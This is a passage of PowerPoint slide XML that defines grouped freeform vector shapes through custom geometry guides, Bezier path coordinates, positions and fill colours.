                      <a:pt x="117" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="10"/>
                      <a:pt x="117" y="10"/>
                      <a:pt x="117" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="4"/>
                      <a:pt x="113" y="0"/>
                      <a:pt x="107" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="0"/>
                      <a:pt x="97" y="4"/>
                      <a:pt x="97" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="182"/>
                      <a:pt x="97" y="182"/>
                      <a:pt x="97" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="182"/>
                      <a:pt x="97" y="183"/>
                      <a:pt x="97" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="198"/>
                      <a:pt x="24" y="198"/>
                      <a:pt x="24" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="205"/>
                      <a:pt x="0" y="205"/>
                      <a:pt x="0" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="210"/>
                      <a:pt x="20" y="210"/>
                      <a:pt x="20" y="210"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="200"/>
                      <a:pt x="83" y="200"/>
                      <a:pt x="83" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="231"/>
                      <a:pt x="97" y="231"/>
                      <a:pt x="97" y="231"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="234"/>
                      <a:pt x="107" y="234"/>
                      <a:pt x="107" y="234"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="230"/>
                      <a:pt x="119" y="230"/>
                      <a:pt x="119" y="230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="200"/>
                      <a:pt x="132" y="200"/>
                      <a:pt x="132" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="195" y="210"/>
                      <a:pt x="195" y="210"/>
                      <a:pt x="195" y="210"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="215" y="20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9" name="Freeform 788"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6940" y="1988"/>
                <a:ext cx="494" cy="361"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 209 w 209"/>
                  <a:gd name="T1" fmla="*/ 60 h 153"/>
                  <a:gd name="T2" fmla="*/ 32 w 209"/>
                  <a:gd name="T3" fmla="*/ 153 h 153"/>
                  <a:gd name="T4" fmla="*/ 209 w 209"/>
                  <a:gd name="T5" fmla="*/ 6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9" h="153">
                    <a:moveTo>
                      <a:pt x="209" y="60"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="0"/>
                      <a:pt x="0" y="65"/>
                      <a:pt x="32" y="153"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="209" y="6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0" name="Freeform 789"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6881" y="2097"/>
                <a:ext cx="459" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 73 w 194"/>
                  <a:gd name="T1" fmla="*/ 50 h 118"/>
                  <a:gd name="T2" fmla="*/ 191 w 194"/>
                  <a:gd name="T3" fmla="*/ 25 h 118"/>
                  <a:gd name="T4" fmla="*/ 194 w 194"/>
                  <a:gd name="T5" fmla="*/ 29 h 118"/>
                  <a:gd name="T6" fmla="*/ 184 w 194"/>
                  <a:gd name="T7" fmla="*/ 14 h 118"/>
                  <a:gd name="T8" fmla="*/ 68 w 194"/>
                  <a:gd name="T9" fmla="*/ 39 h 118"/>
                  <a:gd name="T10" fmla="*/ 8 w 194"/>
                  <a:gd name="T11" fmla="*/ 109 h 118"/>
                  <a:gd name="T12" fmla="*/ 12 w 194"/>
                  <a:gd name="T13" fmla="*/ 118 h 118"/>
                  <a:gd name="T14" fmla="*/ 73 w 194"/>
                  <a:gd name="T15" fmla="*/ 5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4" h="118">
                    <a:moveTo>
                      <a:pt x="73" y="50"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="22"/>
                      <a:pt x="174" y="11"/>
                      <a:pt x="191" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="194" y="29"/>
                      <a:pt x="194" y="29"/>
                      <a:pt x="194" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="194" y="29"/>
                      <a:pt x="185" y="15"/>
                      <a:pt x="184" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="0"/>
                      <a:pt x="115" y="11"/>
                      <a:pt x="68" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="63"/>
                      <a:pt x="0" y="93"/>
                      <a:pt x="8" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="109"/>
                      <a:pt x="10" y="114"/>
                      <a:pt x="12" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="101"/>
                      <a:pt x="32" y="73"/>
                      <a:pt x="73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1" name="Freeform 790"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6862" y="2123"/>
                <a:ext cx="458" cy="304"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 194"/>
                  <a:gd name="T1" fmla="*/ 19 h 129"/>
                  <a:gd name="T2" fmla="*/ 187 w 194"/>
                  <a:gd name="T3" fmla="*/ 19 h 129"/>
                  <a:gd name="T4" fmla="*/ 186 w 194"/>
                  <a:gd name="T5" fmla="*/ 18 h 129"/>
                  <a:gd name="T6" fmla="*/ 183 w 194"/>
                  <a:gd name="T7" fmla="*/ 14 h 129"/>
                  <a:gd name="T8" fmla="*/ 65 w 194"/>
                  <a:gd name="T9" fmla="*/ 39 h 129"/>
                  <a:gd name="T10" fmla="*/ 4 w 194"/>
                  <a:gd name="T11" fmla="*/ 107 h 129"/>
                  <a:gd name="T12" fmla="*/ 4 w 194"/>
                  <a:gd name="T13" fmla="*/ 107 h 129"/>
                  <a:gd name="T14" fmla="*/ 4 w 194"/>
                  <a:gd name="T15" fmla="*/ 109 h 129"/>
                  <a:gd name="T16" fmla="*/ 7 w 194"/>
                  <a:gd name="T17" fmla="*/ 113 h 129"/>
                  <a:gd name="T18" fmla="*/ 8 w 194"/>
                  <a:gd name="T19" fmla="*/ 114 h 129"/>
                  <a:gd name="T20" fmla="*/ 126 w 194"/>
                  <a:gd name="T21" fmla="*/ 90 h 129"/>
                  <a:gd name="T22" fmla="*/ 187 w 194"/>
                  <a:gd name="T23" fmla="*/ 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4" h="129">
                    <a:moveTo>
                      <a:pt x="187" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="187" y="19"/>
                      <a:pt x="187" y="19"/>
                      <a:pt x="187" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="187" y="19"/>
                      <a:pt x="186" y="18"/>
                      <a:pt x="186" y="18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66" y="0"/>
                      <a:pt x="113" y="11"/>
                      <a:pt x="65" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="62"/>
                      <a:pt x="0" y="90"/>
                      <a:pt x="4" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="107"/>
                      <a:pt x="4" y="107"/>
                      <a:pt x="4" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="107"/>
                      <a:pt x="4" y="108"/>
                      <a:pt x="4" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="113"/>
                      <a:pt x="7" y="113"/>
                      <a:pt x="7" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="113"/>
                      <a:pt x="8" y="114"/>
                      <a:pt x="8" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="129"/>
                      <a:pt x="78" y="118"/>
                      <a:pt x="126" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="169" y="65"/>
                      <a:pt x="194" y="36"/>
                      <a:pt x="187" y="19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2" name="Freeform 791"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6739" y="2205"/>
                <a:ext cx="132" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 56"/>
                  <a:gd name="T1" fmla="*/ 17 h 34"/>
                  <a:gd name="T2" fmla="*/ 1 w 56"/>
                  <a:gd name="T3" fmla="*/ 25 h 34"/>
                  <a:gd name="T4" fmla="*/ 2 w 56"/>
                  <a:gd name="T5" fmla="*/ 30 h 34"/>
                  <a:gd name="T6" fmla="*/ 35 w 56"/>
                  <a:gd name="T7" fmla="*/ 23 h 34"/>
                  <a:gd name="T8" fmla="*/ 51 w 56"/>
                  <a:gd name="T9" fmla="*/ 1 h 34"/>
                  <a:gd name="T10" fmla="*/ 46 w 56"/>
                  <a:gd name="T11" fmla="*/ 0 h 34"/>
                  <a:gd name="T12" fmla="*/ 30 w 56"/>
                  <a:gd name="T13" fmla="*/ 1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34">
                    <a:moveTo>
                      <a:pt x="30" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="23"/>
                      <a:pt x="7" y="27"/>
                      <a:pt x="1" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="27"/>
                      <a:pt x="1" y="29"/>
                      <a:pt x="2" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="34"/>
                      <a:pt x="22" y="31"/>
                      <a:pt x="35" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="15"/>
                      <a:pt x="56" y="5"/>
                      <a:pt x="51" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="1"/>
                      <a:pt x="48" y="0"/>
                      <a:pt x="46" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="4"/>
                      <a:pt x="40" y="11"/>
                      <a:pt x="3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3" name="Freeform 792"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6737" y="2203"/>
                <a:ext cx="107" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 45"/>
                  <a:gd name="T1" fmla="*/ 9 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 45"/>
                  <a:gd name="T3" fmla="*/ 26 h 28"/>
                  <a:gd name="T4" fmla="*/ 29 w 45"/>
                  <a:gd name="T5" fmla="*/ 18 h 28"/>
                  <a:gd name="T6" fmla="*/ 45 w 45"/>
                  <a:gd name="T7" fmla="*/ 1 h 28"/>
                  <a:gd name="T8" fmla="*/ 17 w 45"/>
                  <a:gd name="T9" fmla="*/ 9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8">
                    <a:moveTo>
                      <a:pt x="17" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="15"/>
                      <a:pt x="1" y="22"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="28"/>
                      <a:pt x="18" y="24"/>
                      <a:pt x="29" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="12"/>
                      <a:pt x="45" y="5"/>
                      <a:pt x="45" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="0"/>
                      <a:pt x="28" y="3"/>
                      <a:pt x="17" y="9"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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4" name="Freeform 793"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6576" y="2179"/>
                <a:ext cx="130" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 50 w 55"/>
                  <a:gd name="T1" fmla="*/ 2 h 34"/>
                  <a:gd name="T2" fmla="*/ 44 w 55"/>
                  <a:gd name="T3" fmla="*/ 0 h 34"/>
                  <a:gd name="T4" fmla="*/ 27 w 55"/>
                  <a:gd name="T5" fmla="*/ 18 h 34"/>
                  <a:gd name="T6" fmla="*/ 0 w 55"/>
                  <a:gd name="T7" fmla="*/ 26 h 34"/>
                  <a:gd name="T8" fmla="*/ 1 w 55"/>
                  <a:gd name="T9" fmla="*/ 30 h 34"/>
                  <a:gd name="T10" fmla="*/ 34 w 55"/>
                  <a:gd name="T11" fmla="*/ 23 h 34"/>
                  <a:gd name="T12" fmla="*/ 50 w 55"/>
                  <a:gd name="T13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34">
                    <a:moveTo>
                      <a:pt x="50" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="1"/>
                      <a:pt x="46" y="0"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="5"/>
                      <a:pt x="37" y="12"/>
                      <a:pt x="27" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="24"/>
                      <a:pt x="6" y="27"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="28"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="1" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="34" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="55" y="6"/>
                      <a:pt x="5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5" name="Freeform 794"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6576" y="2179"/>
                <a:ext cx="104" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 44 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 27"/>
                  <a:gd name="T2" fmla="*/ 17 w 44"/>
                  <a:gd name="T3" fmla="*/ 9 h 27"/>
                  <a:gd name="T4" fmla="*/ 0 w 44"/>
                  <a:gd name="T5" fmla="*/ 26 h 27"/>
                  <a:gd name="T6" fmla="*/ 27 w 44"/>
                  <a:gd name="T7" fmla="*/ 18 h 27"/>
                  <a:gd name="T8" fmla="*/ 44 w 44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7">
                    <a:moveTo>
                      <a:pt x="44" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="17" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="15"/>
                      <a:pt x="0" y="22"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="27"/>
                      <a:pt x="17" y="24"/>
                      <a:pt x="27" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="12"/>
                      <a:pt x="44" y="5"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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6" name="Freeform 795"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6675" y="2278"/>
                <a:ext cx="132" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 45 w 56"/>
                  <a:gd name="T1" fmla="*/ 0 h 34"/>
                  <a:gd name="T2" fmla="*/ 29 w 56"/>
                  <a:gd name="T3" fmla="*/ 16 h 34"/>
                  <a:gd name="T4" fmla="*/ 1 w 56"/>
                  <a:gd name="T5" fmla="*/ 25 h 34"/>
                  <a:gd name="T6" fmla="*/ 2 w 56"/>
                  <a:gd name="T7" fmla="*/ 30 h 34"/>
                  <a:gd name="T8" fmla="*/ 35 w 56"/>
                  <a:gd name="T9" fmla="*/ 23 h 34"/>
                  <a:gd name="T10" fmla="*/ 51 w 56"/>
                  <a:gd name="T11" fmla="*/ 2 h 34"/>
                  <a:gd name="T12" fmla="*/ 45 w 56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34">
                    <a:moveTo>
                      <a:pt x="45" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="5"/>
                      <a:pt x="38" y="11"/>
                      <a:pt x="29" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="22"/>
                      <a:pt x="7" y="26"/>
                      <a:pt x="1" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="27"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="2" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="35" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="56" y="6"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="1"/>
                      <a:pt x="48" y="0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7" name="Freeform 796"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6673" y="2278"/>
                <a:ext cx="104" cy="62"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 44"/>
                  <a:gd name="T1" fmla="*/ 16 h 26"/>
                  <a:gd name="T2" fmla="*/ 44 w 44"/>
                  <a:gd name="T3" fmla="*/ 0 h 26"/>
                  <a:gd name="T4" fmla="*/ 17 w 44"/>
                  <a:gd name="T5" fmla="*/ 9 h 26"/>
                  <a:gd name="T6" fmla="*/ 0 w 44"/>
                  <a:gd name="T7" fmla="*/ 25 h 26"/>
                  <a:gd name="T8" fmla="*/ 28 w 44"/>
                  <a:gd name="T9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6">
                    <a:moveTo>
                      <a:pt x="28" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="11"/>
                      <a:pt x="43" y="5"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="17" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="14"/>
                      <a:pt x="1" y="20"/>
                      <a:pt x="0" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="26"/>
                      <a:pt x="17" y="22"/>
                      <a:pt x="28" y="16"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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8" name="Freeform 797"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6824" y="2307"/>
                <a:ext cx="130" cy="80"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 47 w 55"/>
                  <a:gd name="T1" fmla="*/ 0 h 34"/>
                  <a:gd name="T2" fmla="*/ 30 w 55"/>
                  <a:gd name="T3" fmla="*/ 16 h 34"/>
                  <a:gd name="T4" fmla="*/ 1 w 55"/>
                  <a:gd name="T5" fmla="*/ 24 h 34"/>
                  <a:gd name="T6" fmla="*/ 2 w 55"/>
                  <a:gd name="T7" fmla="*/ 30 h 34"/>
                  <a:gd name="T8" fmla="*/ 35 w 55"/>
                  <a:gd name="T9" fmla="*/ 23 h 34"/>
                  <a:gd name="T10" fmla="*/ 51 w 55"/>
                  <a:gd name="T11" fmla="*/ 2 h 34"/>
                  <a:gd name="T12" fmla="*/ 47 w 55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34">
                    <a:moveTo>
                      <a:pt x="47" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="5"/>
                      <a:pt x="39" y="11"/>
                      <a:pt x="30" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="23"/>
                      <a:pt x="7" y="26"/>
                      <a:pt x="1" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="27"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="2" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="35" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="55" y="6"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="1"/>
                      <a:pt x="48" y="1"/>
                      <a:pt x="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9" name="Freeform 798"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6822" y="2304"/>
                <a:ext cx="109" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 46"/>
                  <a:gd name="T1" fmla="*/ 17 h 27"/>
                  <a:gd name="T2" fmla="*/ 46 w 46"/>
                  <a:gd name="T3" fmla="*/ 1 h 27"/>
                  <a:gd name="T4" fmla="*/ 16 w 46"/>
                  <a:gd name="T5" fmla="*/ 10 h 27"/>
                  <a:gd name="T6" fmla="*/ 0 w 46"/>
                  <a:gd name="T7" fmla="*/ 25 h 27"/>
                  <a:gd name="T8" fmla="*/ 29 w 46"/>
                  <a:gd name="T9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27">
                    <a:moveTo>
                      <a:pt x="29" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="12"/>
                      <a:pt x="45" y="6"/>
                      <a:pt x="46" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="16" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="15"/>
                      <a:pt x="1" y="21"/>
                      <a:pt x="0" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="27"/>
                      <a:pt x="18" y="24"/>
                      <a:pt x="29" y="17"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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490" name="Group 780"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873603" y="2755355"/>
              <a:ext cx="396875" cy="674687"/>
              <a:chOff x="-7292" y="1988"/>
              <a:chExt cx="888" cy="1514"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="491" name="Freeform 781"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7039" y="2434"/>
                <a:ext cx="0" cy="943"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 943 h 943"/>
                  <a:gd name="T1" fmla="*/ 0 h 943"/>
                  <a:gd name="T2" fmla="*/ 943 h 94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943">
                    <a:moveTo>
                      <a:pt x="0" y="943"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="943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92" name="Line 782"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="-7039" y="2434"/>
                <a:ext cx="0" cy="94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93" name="Freeform 783"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7048" y="2425"/>
                <a:ext cx="18" cy="961"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 8"/>
                  <a:gd name="T1" fmla="*/ 403 h 407"/>
                  <a:gd name="T2" fmla="*/ 0 w 8"/>
                  <a:gd name="T3" fmla="*/ 4 h 407"/>
                  <a:gd name="T4" fmla="*/ 4 w 8"/>
                  <a:gd name="T5" fmla="*/ 0 h 407"/>
                  <a:gd name="T6" fmla="*/ 4 w 8"/>
                  <a:gd name="T7" fmla="*/ 0 h 407"/>
                  <a:gd name="T8" fmla="*/ 8 w 8"/>
                  <a:gd name="T9" fmla="*/ 4 h 407"/>
                  <a:gd name="T10" fmla="*/ 8 w 8"/>
                  <a:gd name="T11" fmla="*/ 4 h 407"/>
                  <a:gd name="T12" fmla="*/ 8 w 8"/>
                  <a:gd name="T13" fmla="*/ 403 h 407"/>
                  <a:gd name="T14" fmla="*/ 4 w 8"/>
                  <a:gd name="T15" fmla="*/ 407 h 407"/>
                  <a:gd name="T16" fmla="*/ 4 w 8"/>
                  <a:gd name="T17" fmla="*/ 407 h 407"/>
                  <a:gd name="T18" fmla="*/ 0 w 8"/>
                  <a:gd name="T19" fmla="*/ 403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07">
                    <a:moveTo>
                      <a:pt x="0" y="40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03"/>
                      <a:pt x="8" y="403"/>
                      <a:pt x="8" y="403"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="405"/>
                      <a:pt x="6" y="407"/>
                      <a:pt x="4" y="407"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="407"/>
                      <a:pt x="4" y="407"/>
                      <a:pt x="4" y="407"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="407"/>
                      <a:pt x="0" y="405"/>
                      <a:pt x="0" y="4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94" name="Freeform 784"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7077" y="2137"/>
                <a:ext cx="340" cy="378"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 340"/>
                  <a:gd name="T1" fmla="*/ 378 h 378"/>
                  <a:gd name="T2" fmla="*/ 340 w 340"/>
                  <a:gd name="T3" fmla="*/ 0 h 378"/>
                  <a:gd name="T4" fmla="*/ 0 w 340"/>
                  <a:gd name="T5" fmla="*/ 378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0" h="378">
                    <a:moveTo>
                      <a:pt x="0" y="378"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="340" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37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95" name="Line 785"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="-7077" y="2137"/>
                <a:ext cx="340" cy="37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96" name="Freeform 786"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7086" y="2125"/>
